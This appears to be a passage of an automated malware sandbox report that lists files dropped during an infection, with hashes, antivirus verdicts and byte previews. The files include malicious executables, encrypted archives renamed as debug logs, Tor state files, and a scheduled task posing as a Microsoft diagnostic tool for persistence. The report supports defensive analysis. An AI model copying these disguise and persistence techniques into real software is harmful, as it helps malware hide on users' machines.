Preview:	# Tor state file last generated on 2023-11-30 11:36:44 local time..# Other times below are in UTC..# You do not need to edit this file.....CircuitBuildTimeBin 775 2..CircuitBuildTimeBin 925 1..CircuitBuildTimeBin 975 2..CircuitBuildTimeBin 1025 1..CircuitBuildTimeBin 1125 2..CircuitBuildTimeBin 1175 1..CircuitBuildTimeBin 1225 1..CircuitBuildTimeBin 1275 3..CircuitBuildTimeBin 1375 1..CircuitBuildTimeBin 1525 1..CircuitBuildTimeBin 1575 1..CircuitBuildTimeBin 1675 1..CircuitBuildTimeBin 1725 2..CircuitBuildTimeBin 1775 1..CircuitBuildTimeBin 2025 1..CircuitBuildTimeBin 2425 1..CircuitBuildTimeBin 2625 1..CircuitBuildTimeBin 3075 1..CircuitBuildTimeBin 3525 1..CircuitBuildTimeBin 3925 2..CircuitBuildTimeBin 4325 1..CircuitBuildTimeBin 5025 1..CircuitBuildTimeBin 6375 1..CircuitBuildTimeBin 15975 1..CircuitBuildTimeBin 16075 1..CircuitBuildTimeBin 16175 1..CircuitBuildTimeBin 16225 1..CircuitBuildTimeBin 16375 2..CircuitBuildTimeBin 16625 1..CircuitBuildTimeBin 16675 2..CircuitBuildTim

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\unverified-microdesc-consensus.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\50E3.exe
File Type:	ASCII text, with very long lines (1006)
Category:	dropped
Size (bytes):	2772448
Entropy (8bit):	5.617662677142841
Encrypted:	false
SSDEEP:	12288:nMquHGVT0PqgmUzCaVIdPclGx04jQv70GZOL+cIbWdXGD5WA2UpglWy:ntuH25Sza4GxNQ0pL7r2DClWy
MD5:	6AAF86E0E44F63AA68A2C7EF8A50852B
SHA1:	A2EFA1DC4317172BB87E6A1D40CDF8CD19ACEE65
SHA-256:	1B86732EAB19C46FB6C7F7FAD5C690152EE5064EB8B1AC6730FEB1956090F920
SHA-512:	805069D82E2A810BD9F20D9BCBB6FCBBEF3D6CB660E258423454C394A9B7BBBCD33B2A2F0AA1C496540FE7B8718480FFB41088D2B3AA494E2DA8DD9D939C2F42
Malicious:	false
Preview:	network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-11-30 10:00:00.fresh-until 2023-11-30 11:00:00.valid-until 2023-11-30 13:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols

C:\Users\user\AppData\Local\Temp\50E3.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1965056
Entropy (8bit):	7.936234261363858
Encrypted:	false
SSDEEP:	49152:Vbe6aahW7iaBUHvG+vxz90ChL0WF+UIGDDS/NL:vaaA7iYb+dtQWFZvSR
MD5:	1457EF90EFDE49A7EE83080CE051D6F7
SHA1:	8CA6D983FE2997FA7009458383B84E0D1EDEB279
SHA-256:	9BB0954A71EDFD122A5E2B14850702A453FDBF5A632265337C0AEE558BDD3E40
SHA-512:	582628E02510812E0ED06CC05A1BFB98E96F019935EFB71D23DD94745A0C5DB12771BF0C81579DD7AD4F44B90E7192B95D5D2ED4A6649ADC00B486C28DF643D0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L......d.................H...p9.............`....@...........................V.....;R......................................<L..<.... V..b...........................................................D..@............................................text... G.......H.................. ..`.data...`.8..`...L...L..............@....rsrc....b... V..d..................@..@................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\57C9.dll

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2023424
Entropy (8bit):	7.897270341584219
Encrypted:	false
SSDEEP:	49152:eNcZZUAkmm8xgSS/wsuldwP5v0GcD8NeQygu8I05:KcYAkuxgBH8GcqeQdI
MD5:	9CFE42665ECB5077F6018A5CB503147B
SHA1:	E128C3AAC06E2FCE3A65C251FBA11AA2F17E05FE
SHA-256:	5912A04EA166E9B9452A69A03F14D76AC4084AE49A6E9F2DEEDD620F6F7DD89E
SHA-512:	A3A701A68C3A6BBE5F8419998355356418A28695B0FC70FEB72BA36144E2E3E7B59DC9E5890D3BA965A44ADFB3709C14D2A66BBF3AA4AC8BA9956A13D61AEF10
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...................................4...........!..L.!This program cannot be run in DOS mode....$...............................................z.....3().....Rich........................................................................................................................PE..L....he...........!.........0......................................................................................`...d...x...........@.......................(...P...................................................D............................text...0........................... ..`.rdata..+...........................@..@.data...\|...........................@...CRT.................p..............@....crt.....U...@...`...0..............@....rsrc...@..............................@.reloc..T1.......@..................@..B....................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\64.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\CL_Debug_Log.txt
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	8750592
Entropy (8bit):	7.949534217345562
Encrypted:	false
SSDEEP:	196608:MbQUVWJ0qmsZ+umKkMH+qaUJxH7fQrpZvg7fCbvwcOAfueo1GX:sQUV80ndum3zb4H+pK7fAOL0
MD5:	D1580EB52E6B28ACFB6CF06AACD95C98
SHA1:	C18645F8B64D1D5432DD0D56E63DD5785BFD4DF2
SHA-256:	83BED5F1456AD4EAC3042C1B269231C95F9515ADCA132B5B1E891858001D604C
SHA-512:	5BD57C5B6D26156C53B863ACA289BC76803BFED64F0F1C239A66F5F67EA2DFEA7C726F0125B7597181280319A94C3B2550F02FCEADB6732F1A941E300224B8A1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v.bi2..:2..:2..:.b.:3..:t..:...:t..:+..:t..:...:;..::..:;..:3..:;..:...:2..:...:.\.:b..:.\.:3..:?..:3..:2.:3..:.\.:3..:Rich2..:................PE..d.....ge.........."...........z.....,..........@.....................................e....`...@...............@.............................h...\|.........w......i..............\|.......................................p............... ............................text............................... ..`.rdata..............................@..@.data...0........^..................@....pdata...i.......j..................@..@.rsrc.....w.......w..j..............@..@.reloc..\|............z..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\760B.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\760B.tmp-shm

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8042.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	297984
Entropy (8bit):	6.038801621407422
Encrypted:	false
SSDEEP:	3072:CDoxfGnmcz040EWCiMMoLQOHgHlxf7kInI5tiYDFUXgUM:PfGFz040nUK7PpQG4
MD5:	F7B08E0D5053C01E5792AB9B8DCB1F11
SHA1:	C620FDFBCFC6D49884DE01D24652890333616A04
SHA-256:	2907C623B4AD8A369B8215407E36FADD7A60182C20B61E7624AEB2223E5B157F
SHA-512:	8A57D31ADD5ECCDEACD011EB7B0108D46096C5A38A7302CB4A4D796B6E8E6C18F9FEE6C0B0B301A0E3DB9C182CE65CD3A1715E904EEA7ACF9D01F3B5496B5AF4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L.....fc......................i.....B7............@...........................k......>..........................................x.....j.............................................................@'..@............................................text...,........................... ..`.data...\|Ug.........................@....rsrc.........j.....................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\808C.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8447.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8D9F.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8EF7.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8FD3.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9041.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CL_Debug_Log.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\38B4.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	739840
Entropy (8bit):	6.639963974757032
Encrypted:	false
SSDEEP:	12288:AwAxBpwU5gU+2/9dB5XlH1YAEa5OLW0TjLWG3rn0Yf5ogmn9X9Rf6TIALr22DIVM:AhY2gUfVH5XlVYzagW4/3rn0Y5zmzRfq
MD5:	43141E85E7C36E31B52B22AB94D5E574
SHA1:	CFD7079A9B268D84B856DC668EDBB9AB9EF35312
SHA-256:	EA308C76A2F927B160A143D94072B0DCE232E04B751F0C6432A94E05164E716D
SHA-512:	9119AE7500AA5CCCF26A0F18FD8454245347E3C01DABBA56A93DBAAAB86535E62B1357170758F3B3445B8359E7DD5D37737318A5D8A6047C499D32D5B64126FC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R.}....I...I...Im..I...Iy..I...I...I...Iy..I...Iy..I...I..LI...I...I...I..NI...I ..I...I ..I...I.U.I5..I.U.I...I...I...IRich...I........................PE..L.....n\.....................,......X.............@.......................................@.....................................x...............................L]......................................................,............................text............................... ..`.rdata..RC.......D..................@..@.data....r..........................@....sxdata......p......................@....rsrc...............................@..@.reloc...i.......j..................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CR_Debug_Log.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\38B4.exe
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	15343298
Entropy (8bit):	7.999985818534239
Encrypted:	true
SSDEEP:	393216:VhrTaQMbrpoC9zdMi7b6hjDzr3K5vlRG4I5dfU5v+:DWQJ8tuhjT3K5tyLfkv+
MD5:	E9C724EB8985E9A4625923CA23594BCD
SHA1:	97A8587B577E7DBE596242C17C22B9F111FA207D
SHA-256:	8ABF152138A2FE9B47A116BCA90D5A29DA0B3BA5447F947A1C94EF9AB838E9C1
SHA-512:	0578E9FE8A4ACBDD22414D8EDEEC8920065DD83E49B8B477054CFA108B3382C30C6510A738616ECAD67D6172E4E40DF567989B7B64508C5BEB8BBE38D2588650
Malicious:	false
Preview:	7z..'...B..Y}.......%.........0.....j..p.7.ZN...".[....Y.....YW!..1A....\t..}....9...p2......PtPn.9....r..U....J.5V.nPD...B.....]v._......KY`LJ,.R..h.z]?L]G(.w.d...s........WTs^......v=......<v...q..eI.I.%2g...&....G.K9\...._..U..-)KG...p..Z.a.6.Y.....8!....Z...bS.`'.....o.3B..F..(..\|?..7.@.X..\|.7...2T..eV..w...S9.4.F.........\|M.0[..C.1..(.....V?.4.....QI...$.......a... .xaS.#....j../...3.T.[.4..}..p..hUx.L.lv.(.c......d.b.....tk."-.Q...RX(!._..w..wA.Mg..v..P.. ..y..._lo..A...\|.....HOo..S...;...\|.o.V.. .;OV......J.....!5...Y....HE~ct1..9ZR....R..`n.Qb.TQT...2.........0.9....9.x@..i.F..K.f........n.-...q...u.Q...........;V..z.....;..83..."......D.b\ '-......N......\|t.1../..@.fZ.rs>.K.r....O.../<.}..e..+.J...M....)..19..o...c.d......Hp%..<6..4U.A.y{a..a?....~....^'...;.....VH.`@W.k8..{..3..(s.sF....`..P0....(}.-..\.N..UVJ...X...B...H...-.fK..&.q......\|...J...$.:;.S.3....%.,...S....e.....j)...9:........9..aSGa.-......s..

C:\Users\user\AppData\Local\Temp\SystemCheck.xml

Download File

Process:	C:\Users\user\AppData\Local\Temp\38B4.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2128
Entropy (8bit):	5.015779405815961
Encrypted:	false
SSDEEP:	48:cbfzDlAFpdE6pGQ4/0QydbQ9I3YODOLNdqmSwuMY:yfzDlAd94/hydbQ9ddqm8f
MD5:	9160347BEC74471E1A79EDFD950629AE
SHA1:	C149A7E5AAB6E349A70B7B458D0EAAA9D301C790
SHA-256:	0FE356F3D04BB43F772604B049FD2B20F3038CA2CE84BF9778B8CCDD481D77AB
SHA-512:	B8061834F658567A1E742496C38688BDECD60191A92163D47470F64AA1FBA23E92DD36FA1D2BB7EFA36F14002C0606013973718B9F107E62D845A17BE4B0D358
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Author>Microsoft Corporation</Author>.. <Description>Starts a system diagnostics application to scan for errors and performance problems.</Description>.. </RegistrationInfo>.. <Triggers>.. <CalendarTrigger>.. <Repetition>.. <Interval>PT1M</Interval>.. <StopAtDurationEnd>false</StopAtDurationEnd>.. </Repetition>.. <StartBoundary>2017-01-01T00:00:00</StartBoundary>.. <Enabled>true</Enabled>.. <ScheduleByDay>.. <DaysInterval>1</DaysInterval>.. </ScheduleByDay>.. </CalendarTrigger>.. <TimeTrigger>.. <Repetition>.. <Interval>PT1M</Interval>.. <StopAtDurationEnd>false</StopAtDurationEnd>.. </Repetition>.. <StartBoundary>2017-01-01T00:00:00</StartBoundary>.. <Enabled>true</Enabled>.. </TimeTrigger>.. </Triggers>.. <Principals>.. <Principa

C:\Users\user\AppData\Local\Temp\asacpiex.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\38B4.exe
File Type:	data
Category:	dropped
Size (bytes):	15343298
Entropy (8bit):	7.999985816475177
Encrypted:	true
SSDEEP:	393216:ghrTaQMbrpoC9zdMi7b6hjDzr3K5vlRG4I5dfU5v+:YWQJ8tuhjT3K5tyLfkv+
MD5:	26AF02BBFA067EA05857F7C50672F77F
SHA1:	45D7BB03DEF67C9AFA54935F7EE0589C793304CC
SHA-256:	B506BF8F79BDA57290A4BBFA3C143A3708D5C35EB19C65E1D722452C1E6F32F5
SHA-512:	69B5079ADD492E39457B87A69A11E2362BE4B83902DAB914796630B055963335D35F57A06A5139C5D45945F19861403B46492E567D0A05B7D2D5D4EA6B4BF957
Malicious:	false
Preview:	........B..Y}.......%.........0.....j..p.7.ZN...".[....Y.....YW!..1A....\t..}....9...p2......PtPn.9....r..U....J.5V.nPD...B.....]v._......KY`LJ,.R..h.z]?L]G(.w.d...s........WTs^......v=......<v...q..eI.I.%2g...&....G.K9\...._..U..-)KG...p..Z.a.6.Y.....8!....Z...bS.`'.....o.3B..F..(..\|?..7.@.X..\|.7...2T..eV..w...S9.4.F.........\|M.0[..C.1..(.....V?.4.....QI...$.......a... .xaS.#....j../...3.T.[.4..}..p..hUx.L.lv.(.c......d.b.....tk."-.Q...RX(!._..w..wA.Mg..v..P.. ..y..._lo..A...\|.....HOo..S...;...\|.o.V.. .;OV......J.....!5...Y....HE~ct1..9ZR....R..`n.Qb.TQT...2.........0.9....9.x@..i.F..K.f........n.-...q...u.Q...........;V..z.....;..83..."......D.b\ '-......N......\|t.1../..@.fZ.rs>.K.r....O.../<.}..e..+.J...M....)..19..o...c.d......Hp%..<6..4U.A.y{a..a?....~....^'...;.....VH.`@W.k8..{..3..(s.sF....`..P0....(}.-..\.N..UVJ...X...B...H...-.fK..&.q......\|...J...$.:;.S.3....%.,...S....e.....j)...9:........9..aSGa.-......s..

C:\Users\user\AppData\Local\Temp\aut3D19.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\38B4.exe
File Type:	data
Category:	dropped
Size (bytes):	15343298
Entropy (8bit):	7.999985816475177
Encrypted:	true
SSDEEP:	393216:ghrTaQMbrpoC9zdMi7b6hjDzr3K5vlRG4I5dfU5v+:YWQJ8tuhjT3K5tyLfkv+
MD5:	26AF02BBFA067EA05857F7C50672F77F
SHA1:	45D7BB03DEF67C9AFA54935F7EE0589C793304CC
SHA-256:	B506BF8F79BDA57290A4BBFA3C143A3708D5C35EB19C65E1D722452C1E6F32F5
SHA-512:	69B5079ADD492E39457B87A69A11E2362BE4B83902DAB914796630B055963335D35F57A06A5139C5D45945F19861403B46492E567D0A05B7D2D5D4EA6B4BF957
Malicious:	false
Preview:	........B..Y}.......%.........0.....j..p.7.ZN...".[....Y.....YW!..1A....\t..}....9...p2......PtPn.9....r..U....J.5V.nPD...B.....]v._......KY`LJ,.R..h.z]?L]G(.w.d...s........WTs^......v=......<v...q..eI.I.%2g...&....G.K9\...._..U..-)KG...p..Z.a.6.Y.....8!....Z...bS.`'.....o.3B..F..(..\|?..7.@.X..\|.7...2T..eV..w...S9.4.F.........\|M.0[..C.1..(.....V?.4.....QI...$.......a... .xaS.#....j../...3.T.[.4..}..p..hUx.L.lv.(.c......d.b.....tk."-.Q...RX(!._..w..wA.Mg..v..P.. ..y..._lo..A...\|.....HOo..S...;...\|.o.V.. .;OV......J.....!5...Y....HE~ct1..9ZR....R..`n.Qb.TQT...2.........0.9....9.x@..i.F..K.f........n.-...q...u.Q...........;V..z.....;..83..."......D.b\ '-......N......\|t.1../..@.fZ.rs>.K.r....O.../<.}..e..+.J...M....)..19..o...c.d......Hp%..<6..4U.A.y{a..a?....~....^'...;.....VH.`@W.k8..{..3..(s.sF....`..P0....(}.-..\.N..UVJ...X...B...H...-.fK..&.q......\|...J...$.:;.S.3....%.,...S....e.....j)...9:........9..aSGa.-......s..

C:\Users\user\AppData\Local\Temp\aut41C9.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\38B4.exe
File Type:	data
Category:	dropped
Size (bytes):	501714
Entropy (8bit):	7.662599836092559
Encrypted:	false
SSDEEP:	12288:LG6Zgtvg5rBo85Q8pW3VQ3k8FujwH4edbV:LPQ0rm823ekwH4eVV
MD5:	AAC0958ECD2F69D8BD813D96D233BD3E
SHA1:	5BF757FD20C74F7185E201B00BD9145734D3E3AE
SHA-256:	17B4E7A85169B27A7F92CDFA8D89BCA739CEBD15B17BC2D709517E3364EA886F
SHA-512:	D2B9C9B135947CA7E327708978343468A8E8E79AD2812419FFF6E23E8C21F4697E7C6F51DC4970AD04216A333004873600DF2F7EF0677E71CA5E4C77E550CF77
Malicious:	false
Preview:	EA06..J......................Z......@`..t.u..m!<....L..j..M.Ap.[..+..Ac.......e.\...... .S.r.m..e.Ca.. .....7..[.....j...b.......@...R;I......f........c.L......"%I...^.8...{.....E... 0..5......G...8.V.........~......@`.....\.......@a`.."...K P......."..&.. .6@.....A..@.5..C..w..P .0........(.>@.m.^............s..~L...L.....?. .@.w....]t...........H.....@.u .@,...t....0...P.Q...`.@.......'..yr..>.....1.....=.(8......k.....#....\|P(..]r..p.....G.."...v..> .2]r..-..&....@.K.... ...\|.(.....S..$...[....f\|......S$.LM6.3..0.\..K.....t..=....%..=.@..k4........$R.t.Y..(.....C..E.I.....o.T..L.4y...r......~.].........b.x.%..P.[c.................X/....@1th&..f..$..6&)A.`........8...#q...`........$.j./..=.H...... ........r.../..Z @..C......5....l.../..U.T....2.......'.....z..uC..(..d..$.(i...B.`..F..H..z.......+5.^..a..../F..".z/`.......!.LL4.@.W.<?...d..+<=.h...A.0....3.bn..L.......43.N....&...i...E:@.F@}............. .@..$....c...g.....t..~.X.Y..H=..0..v.z<...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\38B4.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	8750592
Entropy (8bit):	7.949534217345562
Encrypted:	false
SSDEEP:	196608:MbQUVWJ0qmsZ+umKkMH+qaUJxH7fQrpZvg7fCbvwcOAfueo1GX:sQUV80ndum3zb4H+pK7fAOL0
MD5:	D1580EB52E6B28ACFB6CF06AACD95C98
SHA1:	C18645F8B64D1D5432DD0D56E63DD5785BFD4DF2
SHA-256:	83BED5F1456AD4EAC3042C1B269231C95F9515ADCA132B5B1E891858001D604C
SHA-512:	5BD57C5B6D26156C53B863ACA289BC76803BFED64F0F1C239A66F5F67EA2DFEA7C726F0125B7597181280319A94C3B2550F02FCEADB6732F1A941E300224B8A1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 70%
